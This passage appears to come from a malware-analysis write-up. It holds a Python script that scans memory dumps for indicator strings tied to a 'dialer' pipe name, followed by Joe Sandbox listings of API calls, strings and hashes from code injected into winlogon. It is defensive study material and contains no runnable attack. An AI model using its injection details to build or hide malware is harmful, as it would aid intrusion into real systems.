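ENCODINGS: Dict[str, str] = {"ascii": "ascii", "utf-16le": "utf-16-le"}

# (needle, encoding label, start offset, end offset)
Hit = Tuple[str, str, int, int]


def find_strings(data: bytes, needles: List[str] = SAMPLE_STRINGS) -> List[Hit]:
    """Locate every needle in data, in ASCII and UTF-16LE, sorted by offset.

    A hit lying entirely inside a hit for a longer needle is suppressed, so
    the generic token "dialer" is not reported again for "dialerchildproc".
    """
    raw: List[Hit] = []
    for needle in needles:
        for label, codec in ENCODINGS.items():
            pattern = needle.encode(codec)
            start = 0
            while (idx := data.find(pattern, start)) != -1:
                raw.append((needle, label, idx, idx + len(pattern)))
                start = idx + 1

    hits: List[Hit] = []
    for hit in raw:
        nested = any(
            other[2] <= hit[2] and hit[3] <= other[3] and len(other[0]) > len(hit[0])
            for other in raw
        )
        if not nested:
            hits.append(hit)
    return sorted(hits, key=lambda h: h[2])


def summarize(hits: List[Hit]) -> Dict[str, int]:
    """Count hits per needle, regardless of encoding."""
    counts: Dict[str, int] = {}
    for needle, _label, _start, _end in hits:
        counts[needle] = counts.get(needle, 0) + 1
    return counts


def scan_file(path: str) -> List[Hit]:
    """Read a file (PE on disk or a dumped memory region) and scan it."""
    with open(path, "rb") as fh:
        return find_strings(fh.read())


# Constructed stand-in for a memory dump (not taken from the report): the pipe
# name as a wide string, one counter path as ASCII, and a bare "dialer".
SAMPLE_DUMP: bytes = (
    b"\x00" * 16
    + r"\\.\pipe\dialerchildproc".encode("utf-16-le")
    + b"\x00" * 8
    + rb"\GPU user(*)\Utilization Percentage"
    + b"\x00" * 8
    + b"dialer\x00"
)

if __name__ == "__main__":
    found = scan_file(sys.argv[1]) if len(sys.argv) > 1 else find_strings(SAMPLE_DUMP)
    for needle, label, start, end in found:
        print(f"0x{start:08x}-0x{end:08x}  {label:8s}  {needle}")
    print(summarize(found))
```

Run it with the path of a downloaded `.sdmp` region or the dropped PE as the only argument; without an argument it scans the constructed sample. Reported offsets are relative to the start of the file, so add the region's base (for these entries, 000002D0165E0000) to map a hit back to a virtual address.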
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000002.3448686152.000002D0165E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                           • Associated: 00000032.00000002.3448572183.000002D0165E0000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000032.00000002.3448840592.000002D0165F6000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000032.00000002.3448901031.000002D016601000.00000004.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000032.00000002.3449005210.000002D016603000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000032.00000002.3449145667.000002D016609000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_2_2d0165e0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                          • String ID:
                                                          • API String ID: 190073905-0
                                                          • Opcode ID: c075132b8ffb7c8aa12930f0dbbf7461f30bd8bef12e3c9d76da9105ae1b8dff
                                                          • Instruction ID: 91afba1748d56d779d5f9f2092c3f3038b410f7bb8feb96aa5ac84da837e85c9
                                                          • Opcode Fuzzy Hash: c075132b8ffb7c8aa12930f0dbbf7461f30bd8bef12e3c9d76da9105ae1b8dff
                                                          • Instruction Fuzzy Hash: A581B2217006C186FF54ABE59CC93B9E291AB85780FD4406BEA5D477B6EB3ACF45C700
                                                          APIs
                                                          • LoadLibraryExW.KERNEL32(?,?,?,000002D0165EA3B3,?,?,?,000002D0165E9B9C,?,?,?,?,000002D0165E96BD), ref: 000002D0165EA279
                                                          • GetLastError.KERNEL32(?,?,?,000002D0165EA3B3,?,?,?,000002D0165E9B9C,?,?,?,?,000002D0165E96BD), ref: 000002D0165EA287
                                                          • LoadLibraryExW.KERNEL32(?,?,?,000002D0165EA3B3,?,?,?,000002D0165E9B9C,?,?,?,?,000002D0165E96BD), ref: 000002D0165EA2B1
                                                          • FreeLibrary.KERNEL32(?,?,?,000002D0165EA3B3,?,?,?,000002D0165E9B9C,?,?,?,?,000002D0165E96BD), ref: 000002D0165EA2F7
                                                          • GetProcAddress.KERNEL32(?,?,?,000002D0165EA3B3,?,?,?,000002D0165E9B9C,?,?,?,?,000002D0165E96BD), ref: 000002D0165EA303
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000002.3448686152.000002D0165E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                           • Associated: 00000032.00000002.3448572183.000002D0165E0000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000032.00000002.3448840592.000002D0165F6000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000032.00000002.3448901031.000002D016601000.00000004.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000032.00000002.3449005210.000002D016603000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000032.00000002.3449145667.000002D016609000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_2_2d0165e0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Library$Load$AddressErrorFreeLastProc
                                                          • String ID: api-ms-
                                                          • API String ID: 2559590344-2084034818
                                                          • Opcode ID: c60201aec778344204bcef1649fbeec24da53dc38ebde7e62b727d681ed7f771
                                                          • Instruction ID: 5592ec4faebcf409305b4b2890a21ef29463e234aef555377722e5be50b850f7
                                                          • Opcode Fuzzy Hash: c60201aec778344204bcef1649fbeec24da53dc38ebde7e62b727d681ed7f771
                                                          • Instruction Fuzzy Hash: 0931CA31312BD0D2EF129BE6AC88755A394B758B60FD90626DD1E173B1EF3ACA458310
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000002.3448686152.000002D0165E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                           • Associated: 00000032.00000002.3448572183.000002D0165E0000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000032.00000002.3448840592.000002D0165F6000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000032.00000002.3448901031.000002D016601000.00000004.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000032.00000002.3449005210.000002D016603000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000032.00000002.3449145667.000002D016609000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_2_2d0165e0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                          • String ID: CONOUT$
                                                          • API String ID: 3230265001-3130406586
                                                          • Opcode ID: 825ce686359a22e25232def11d6f08b48dee252c530cecc749e4dc9d381a3549
                                                          • Instruction ID: 1ab61b0cf0c9db4a56c2668a424dfc859a79e6a8f03fae7eefaa9eff8ed4efeb
                                                          • Opcode Fuzzy Hash: 825ce686359a22e25232def11d6f08b48dee252c530cecc749e4dc9d381a3549
                                                          • Instruction Fuzzy Hash: 8A118231310B9086E7508BE2FC88319B6A4F788FE5F94426AEA5E877B4DF79CD048744
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000002.3448686152.000002D0165E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                           • Associated: 00000032.00000002.3448572183.000002D0165E0000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000032.00000002.3448840592.000002D0165F6000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000032.00000002.3448901031.000002D016601000.00000004.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000032.00000002.3449005210.000002D016603000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000032.00000002.3449145667.000002D016609000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_2_2d0165e0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocFree
                                                          • String ID: dialer
                                                          • API String ID: 756756679-3528709123
                                                          • Opcode ID: b0319cbd86f06d073dcced0acdf6bc1c6042bb64f80e9fc0b828a3d11e191795
                                                          • Instruction ID: 83f44d16bcc7c953f433701ed3b21392eed8fb092a97d38f6cb15fabea07f430
                                                          • Opcode Fuzzy Hash: b0319cbd86f06d073dcced0acdf6bc1c6042bb64f80e9fc0b828a3d11e191795
                                                          • Instruction Fuzzy Hash: AB318422701B9182EF50DFE6ED88769A3A0FB64B80F8440269E8C47B76DF35DD658740
                                                          APIs
                                                          • GetLastError.KERNEL32(?,?,?,000002D0165EDAE5,?,?,?,?,000002D0165EDBA8), ref: 000002D0165ED3DF
                                                          • FlsSetValue.KERNEL32(?,?,?,000002D0165EDAE5,?,?,?,?,000002D0165EDBA8), ref: 000002D0165ED415
                                                          • FlsSetValue.KERNEL32(?,?,?,000002D0165EDAE5,?,?,?,?,000002D0165EDBA8), ref: 000002D0165ED442
                                                          • FlsSetValue.KERNEL32(?,?,?,000002D0165EDAE5,?,?,?,?,000002D0165EDBA8), ref: 000002D0165ED453
                                                          • FlsSetValue.KERNEL32(?,?,?,000002D0165EDAE5,?,?,?,?,000002D0165EDBA8), ref: 000002D0165ED464
                                                          • SetLastError.KERNEL32(?,?,?,000002D0165EDAE5,?,?,?,?,000002D0165EDBA8), ref: 000002D0165ED47F
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000002.3448686152.000002D0165E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                           • Associated: 00000032.00000002.3448572183.000002D0165E0000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000032.00000002.3448840592.000002D0165F6000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000032.00000002.3448901031.000002D016601000.00000004.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000032.00000002.3449005210.000002D016603000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000032.00000002.3449145667.000002D016609000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_2_2d0165e0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Value$ErrorLast
                                                          • String ID:
                                                          • API String ID: 2506987500-0
                                                          • Opcode ID: 7fc5e4c2f951738899047b95e00f4424a4026db9f78df7ad039e65ab4a94a20b
                                                          • Instruction ID: e7f75237d409834f9270787a9ddfca5b93ce218f773e8bdf0e17015f71c3d2ee
                                                          • Opcode Fuzzy Hash: 7fc5e4c2f951738899047b95e00f4424a4026db9f78df7ad039e65ab4a94a20b
                                                          • Instruction Fuzzy Hash: 1C1181222452C041FF54A3F99DCD32DE2425B447F0F94432BA87E07AF6DE6ADE414200
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000002.3448686152.000002D0165E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                          • Associated: 00000032.00000002.3448572183.000002D0165E0000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3448840592.000002D0165F6000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3448901031.000002D016601000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3449005210.000002D016603000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3449145667.000002D016609000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_2_2d0165e0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                          • String ID:
                                                          • API String ID: 517849248-0
                                                          • Opcode ID: b82d1bbac2a4a5b9d6dbe5f2df15dcec51c980f52b633491719cdad5f7bdf37e
                                                          • Instruction ID: 4c731cbfdfe852defde7cbefce4d1ab1dca6f69176fd26bd62420e10787de74a
                                                          • Opcode Fuzzy Hash: b82d1bbac2a4a5b9d6dbe5f2df15dcec51c980f52b633491719cdad5f7bdf37e
                                                          • Instruction Fuzzy Hash: 7D018021304B9082EB20DBA2EC9C75963A5F788FC1F984176DE8D83764DE3DC989C750
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000002.3448686152.000002D0165E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                          • Associated: 00000032.00000002.3448572183.000002D0165E0000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3448840592.000002D0165F6000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3448901031.000002D016601000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3449005210.000002D016603000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3449145667.000002D016609000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_2_2d0165e0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                          • String ID:
                                                          • API String ID: 449555515-0
                                                          • Opcode ID: 8662155c9f7376030badf6deb1f9cc8df7edcdadcbb5a73039a50034e0df76dd
                                                          • Instruction ID: db5adb49f1b7d242ecc1ff3c97efdbb4f761815ae82f0539aa4f5c8e4211eca5
                                                          • Opcode Fuzzy Hash: 8662155c9f7376030badf6deb1f9cc8df7edcdadcbb5a73039a50034e0df76dd
                                                          • Instruction Fuzzy Hash: 40018C34611B9482EF219BA2EC8CB1A73A9BB48B41F94442ADD4D077B5EF3DCD488710
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000002.3448686152.000002D0165E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                          • Associated: 00000032.00000002.3448572183.000002D0165E0000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3448840592.000002D0165F6000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3448901031.000002D016601000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3449005210.000002D016603000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3449145667.000002D016609000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_2_2d0165e0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                          • String ID: csm$f
                                                          • API String ID: 2395640692-629598281
                                                          • Opcode ID: 124d9c0b905e6e6f2e62f9bd05bcfd16d2c666ef5833f5a39d15387171bb82e0
                                                          • Instruction ID: 261a320c93590906417959c0e00bb8db65f3674152eb288c157b2766e248c12c
                                                          • Opcode Fuzzy Hash: 124d9c0b905e6e6f2e62f9bd05bcfd16d2c666ef5833f5a39d15387171bb82e0
                                                          • Instruction Fuzzy Hash: BF51B0326116908AEF24CF65EC88B59B7A5F740B89F908127DE5E47798EB36DE41C700
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000003.2231390678.000002D016580000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002D016580000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_3_2d016580000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                          • String ID: displacement map'$csm$f
                                                          • API String ID: 3242871069-3478954885
                                                          • Opcode ID: 911b6d09506e82739bdc666af230172d8f47b592f6a0b26bc0314746b579121d
                                                          • Instruction ID: c171492b1571ac84152a0bc2ad70f6ed9fdebf7f741930861dea7dd95c6598aa
                                                          • Opcode Fuzzy Hash: 911b6d09506e82739bdc666af230172d8f47b592f6a0b26bc0314746b579121d
                                                          • Instruction Fuzzy Hash: A951D3327126808BEB14CF96FC88B183799F340BD8F928122DA8E43BA8DB74CD41C701
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000003.2231390678.000002D016580000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002D016580000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_3_2d016580000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                          • String ID: displacement map'$csm$f
                                                          • API String ID: 3242871069-3478954885
                                                          • Opcode ID: 83240c1be95a85a2168ddca1a7ce1f874f475d626e55e81d58b9bdf2105a26fb
                                                          • Instruction ID: 9283a21ec75857c9312e7aa528c38f2aa51bb37eda7f0ac0048f89cce66190ce
                                                          • Opcode Fuzzy Hash: 83240c1be95a85a2168ddca1a7ce1f874f475d626e55e81d58b9bdf2105a26fb
                                                          • Instruction Fuzzy Hash: F6318B322016C0D6E714DF92FC88B1937A8F740BD8F968416AE9E07BA9CB38CD41CB04
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000002.3448686152.000002D0165E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                          • Associated: 00000032.00000002.3448572183.000002D0165E0000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3448840592.000002D0165F6000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3448901031.000002D016601000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3449005210.000002D016603000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3449145667.000002D016609000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_2_2d0165e0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: FinalHandleNamePathlstrlen
                                                          • String ID: \\?\
                                                          • API String ID: 2719912262-4282027825
                                                          • Opcode ID: d5ec68f96dae6b7ecf4cdbbeb250ae8ba7b628e03b919f4631671672637286c6
                                                          • Instruction ID: fd964db9a84d4bb375de0aedce81a24ee7f98beb5ec0a0efeb79b1a2d33cd7e4
                                                          • Opcode Fuzzy Hash: d5ec68f96dae6b7ecf4cdbbeb250ae8ba7b628e03b919f4631671672637286c6
                                                          • Instruction Fuzzy Hash: 2DF04F623446C192EB308F61FDD87A9A360F744B99FC44022DA4D475A4DE7DCA8CCB10
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000002.3448686152.000002D0165E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                          • Associated: 00000032.00000002.3448572183.000002D0165E0000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3448840592.000002D0165F6000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3448901031.000002D016601000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3449005210.000002D016603000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3449145667.000002D016609000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_2_2d0165e0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: CombinePath
                                                          • String ID: \\.\pipe\
                                                          • API String ID: 3422762182-91387939
                                                          • Opcode ID: e19f02f46d5f5175cba9bea6f0663c254bbceec99479fcaac31b51916b51a9ba
                                                          • Instruction ID: c344033dd0d2eb744401732b52d51cb32e72f8a85aad8a03c531d78be5b51dda
                                                          • Opcode Fuzzy Hash: e19f02f46d5f5175cba9bea6f0663c254bbceec99479fcaac31b51916b51a9ba
                                                          • Instruction Fuzzy Hash: 12F08C60304BD092EF108BA7BD88219A260BB8CFC0F888172EE5E07B79CF2CC9458710
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000002.3448686152.000002D0165E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                          • Associated: 00000032.00000002.3448572183.000002D0165E0000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3448840592.000002D0165F6000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3448901031.000002D016601000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3449005210.000002D016603000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3449145667.000002D016609000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_2_2d0165e0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                          • String ID: CorExitProcess$mscoree.dll
                                                          • API String ID: 4061214504-1276376045
                                                          • Opcode ID: 98eb24e4d57f1585c54f2d3d16aa4b08ded3b1fa128793edf9192e1fe004f7b7
                                                          • Instruction ID: 1bbfd0d0181f79ce92fa85e2204fa79ab9098d121dfd698e154c4333107ee7c2
                                                          • Opcode Fuzzy Hash: 98eb24e4d57f1585c54f2d3d16aa4b08ded3b1fa128793edf9192e1fe004f7b7
                                                          • Instruction Fuzzy Hash: F2F09065311A8181EF188BE4ECCC3296360FB887A5FD4125BDA6E462F4CF2DC948C310
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000002.3448686152.000002D0165E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                          • Associated: 00000032.00000002.3448572183.000002D0165E0000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3448840592.000002D0165F6000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3448901031.000002D016601000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3449005210.000002D016603000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3449145667.000002D016609000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_2_2d0165e0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: CurrentThread
                                                          • String ID:
                                                          • API String ID: 2882836952-0
                                                          • Opcode ID: 3d2bacb6cfedfda86da8aef618d55a465eaed815584c29066aa84670fc6d8ab3
                                                          • Instruction ID: 60600bb0f7767c314363c39a07b9ff83c9262393bfb243a1703b11c97863d28b
                                                          • Opcode Fuzzy Hash: 3d2bacb6cfedfda86da8aef618d55a465eaed815584c29066aa84670fc6d8ab3
                                                          • Instruction Fuzzy Hash: 84619136619B84C7EB60CB95E99831AB7A4F384754F901116FA8E47BB4DB7ECA44CF00
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000003.2231390678.000002D016580000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002D016580000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_3_2d016580000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: _set_statfp
                                                          • String ID:
                                                          • API String ID: 1156100317-0
                                                          • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                          • Instruction ID: 3fd1773397185434a97919cd340e0ae31bd0b89bcc84e2b89b2f3325c9289b53
                                                          • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                          • Instruction Fuzzy Hash: 1911C632A15AC0C5FB541EE8ECDE36914546B643BCFC52637AA7E0A2FBCF28CC448100
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000002.3448686152.000002D0165E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                          • Associated: 00000032.00000002.3448572183.000002D0165E0000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3448840592.000002D0165F6000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3448901031.000002D016601000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3449005210.000002D016603000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3449145667.000002D016609000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_2_2d0165e0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: _set_statfp
                                                          • String ID:
                                                          • API String ID: 1156100317-0
                                                          • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                          • Instruction ID: 54a786291861fe94d045adb98334aad2a449724ce9aef7fbf1e65a188d02e38a
                                                          • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                          • Instruction Fuzzy Hash: 4011CC32A16AD101FB5832E4ECDD3691D816B59378FC446B7AA7E067F7CB24CC494200
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000002.3448686152.000002D0165E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                          • Associated: 00000032.00000002.3448572183.000002D0165E0000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3448840592.000002D0165F6000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3448901031.000002D016601000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3449005210.000002D016603000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3449145667.000002D016609000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_2_2d0165e0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: CallEncodePointerTranslator
                                                          • String ID: MOC$RCC
                                                          • API String ID: 3544855599-2084237596
                                                          • Opcode ID: 05fb19cb5d958d360e5f46d501e280b4416caeae58329d8bd7a5de4c8cbcf2a2
                                                          • Instruction ID: e34cecc76fbc14008044abe63a4b6d95f846595ab788ded8b10d6db0ff7985c2
                                                          • Opcode Fuzzy Hash: 05fb19cb5d958d360e5f46d501e280b4416caeae58329d8bd7a5de4c8cbcf2a2
                                                          • Instruction Fuzzy Hash: 1A617D77A00B848AEB20DFA5D88439DB7A0F744B88F444216EF5D17BA9DB39DA95C700
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000003.2231390678.000002D016580000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002D016580000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_3_2d016580000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                          • String ID: csm$csm
                                                          • API String ID: 3896166516-3733052814
                                                          • Opcode ID: 92a9139125581d210e17e0e512ec335e12b84a8ad252812ef56c38af1cf641ca
                                                          • Instruction ID: 7282ddc68bfdaa4e78263fba1861d806cdaf687bbc007268760927ceaafd848d
                                                          • Opcode Fuzzy Hash: 92a9139125581d210e17e0e512ec335e12b84a8ad252812ef56c38af1cf641ca
                                                          • Instruction Fuzzy Hash: D6516D326007C086EB648FA7998835877A8F354B94F945117DE9D87FEADB38D861DB00
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000002.3448686152.000002D0165E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                          • Associated: 00000032.00000002.3448572183.000002D0165E0000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3448840592.000002D0165F6000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3448901031.000002D016601000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3449005210.000002D016603000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3449145667.000002D016609000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_2_2d0165e0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                          • String ID: csm$csm
                                                          • API String ID: 3896166516-3733052814
                                                          • Opcode ID: 92a9139125581d210e17e0e512ec335e12b84a8ad252812ef56c38af1cf641ca
                                                          • Instruction ID: 224713e3047f848022d7ff7e0bc2caf07f455a724ffe94c4f97ae2bcea0e1f0e
                                                          • Opcode Fuzzy Hash: 92a9139125581d210e17e0e512ec335e12b84a8ad252812ef56c38af1cf641ca
                                                          • Instruction Fuzzy Hash: 62517B325003C086EF648FA1AEC935CB6A1E759B86F945217DA8D87BE5CB3ACE508710
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000002.3448686152.000002D0165E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                          • Associated: 00000032.00000002.3448572183.000002D0165E0000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3448840592.000002D0165F6000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3448901031.000002D016601000.00000004.00000001.00020000.00000000.sdmp
